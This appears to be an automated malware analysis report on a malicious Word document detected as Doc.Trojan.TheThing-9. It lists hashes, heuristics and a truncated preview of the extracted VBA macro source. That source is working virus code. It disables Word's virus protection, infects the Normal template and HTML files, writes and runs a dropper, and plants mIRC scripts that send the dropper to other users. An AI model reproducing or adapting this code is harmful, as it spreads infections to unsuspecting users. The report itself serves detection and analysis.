Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8dc061c74337c77…

MALICIOUS

Office (OLE)

39.5 KB Created: 2003-12-26 10:38:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ecba0b8220f9f9f27bd766af60ed4119 SHA-1: 9646cbf43770c4950a2e600c050fb95fe6e14079 SHA-256: c8dc061c74337c77fb200a25df85591d8fc16e1767829d78679e9bb4c711696e
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a Microsoft Word document containing VBA macros. The macros are designed to execute a file named 'thething.com' from the 'c:\' directory, which is then deleted. The script also attempts to infect HTML files by embedding code within them. The presence of Shell() calls and the explicit execution of a file strongly suggest a downloader or dropper functionality.

Heuristics 4

  • ClamAV: Doc.Trojan.TheThing-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.TheThing-9
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17233 bytes
SHA-256: 7290cbee47fdaada10510207b779c62bdcaf88f1e64e13f97f622c4972d670cc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
 On Error Resume Next
'TheThing
' by CyberShadow//SMF
 Call DisableAll
 Call infectDoc
 Call infectMIRC
 Call WriteDump("c:\"): rv = Shell("c:\thething.com", 6)
 Kill "c:\thething.com"
 Call infectHTMS
 Application.ScreenUpdating = True
End Sub
Private Sub infectHTMS()
 On Error Resume Next
 a = System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders", "Personal")
 Call SearchForHTM(a)
 a = Environ("PATH")
 i = 1
 Do While i <= Len(a)
  c = ""
  Do While i <= Len(a) And Mid$(a, i, 1) <> ";"
   c = c + Mid$(a, i, 1)
   i = i + 1
  Loop
  Call SearchForHTM(c)
  i = i + 1
 Loop
End Sub
Private Sub ViewVBCode(): Stealth: End Sub
Private Sub ToolsMacro(): Stealth: End Sub
Private Sub FileTemplates(): Stealth: End Sub
Private Sub Stealth(): On Error Resume Next
    ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
Private Sub SearchForHTM(PathForHTM)
 On Error Resume Next
 Target = Dir$(PathForHTM + "\*.htm*")
 If Target = "" Then GoTo NoHTMs
 Do
  Open PathForHTM + "\" + Target For Input As #1
  Line Input #1, a
  If a <> "<html> <CyberShadow>" Then
   c = a
   Do While Not EOF(1)
    Input #1, a
    c = c + Chr$(13) + Chr$(10) + a
   Loop
  Close #1
  Open PathForHTM + "\" + Target For Output As #1
   Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
   For i = 1 To AD.countoflines
    ca = AD.lines(i, 1)
    If i < 30 Then ca = Mid$(ca, 2, Len(ca) - 1)
    If i >= 30 And i < AD.countoflines - 2 Then ca = "'" + ca
    If ca <> "" Then Print #1, ca
   Next
  Print #1, c
  End If
  Close #1
  Target = Dir$
 Loop While Target <> ""
NoHTMs:
End Sub
Private Sub infectMIRC()
 For i = 0 To 5
  a = Chr$(Asc("C") + i)
  Call infect(a)
 Next
End Sub
Private Sub infect(a)
 On Error GoTo outta
 a1 = a + ":\mirc\"
 Open a1 + "script.ini" For Output As #1
  Print #1, "[script]"
  Print #1, "n0=on 1:JOIN:#:/dcc send $nick " + a1 + "thething.com"
 Close #1
 dropperPath = a1
 Call WriteDump(dropperPath)
outta:
End Sub
Private Sub DisableAll()
 On Error Resume Next
 SetAttr NormalTemplate.Path + "\" + NormalTemplate, 0
 With Application
  .EnableCancelKey = True
  .ScreenUpdating = False
  .ShowVisualBasicEditor = False
 End With
 With Options
  .ConfirmConversions = False
  .SaveNormalPrompt = False
  .VirusProtection = False
 End With
End Sub
Private Sub infectDoc()
 On Error Resume Next
 Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 If NT.lines(1, 1) <> "<html> <CyberShadow>" Then
   NT.DeleteLines 1, NT.countoflines
   NT.Insertlines 1, AD.lines(1, AD.countoflines)
 End If
 If AD.lines(1, 1) <> "<html> <CyberShadow>" Then
   AD.DeleteLines 1, AD.countoflines
   AD.Insertlines 1, NT.lines(1, NT.countoflines)
 End If
 i = 1: c = AD.countofline
 Do While i <= c
  If AD.lines(i, 1) = "</HTML" + ">" Then
   AD.DeleteLines i + 1, AD.countoflines - i - 1
   i = c
  End If
  i = i + 1
 Loop
 i = 1: c = NT.countoflines
 Do While i <= c
  If NT.lines(i, 1) = "</HTML" + ">" Then
   NT.DeleteLines i + 1, NT.countoflines - i - 1
   i = c
  End If
  i = i + 1
 Loop
End Sub
Private Sub WriteDump(dropperPath)
 On Error Resume Next
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 checkit = "Dumpin"
 i = 1: GetDump = 0
 Do While i < AD.countoflines
  a = AD.lines(i, 1)
  If Len(a) > Len(checkit) Then
   For j = 1 To Len(a) - Len(checkit)
    If Mid$(a, j, Len(checkit) + 1) = checkit + "g" Then GetDump = i + 1: i = AD.countoflines
   Next
  End If
  i = i + 1
 Loop
 dropperBody = ""
 Do While Mid$(AD.lines(GetDump, 1), 1, 1) = "'"
  If Len(AD.lines(GetDump, 1)) > 2 Then
  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.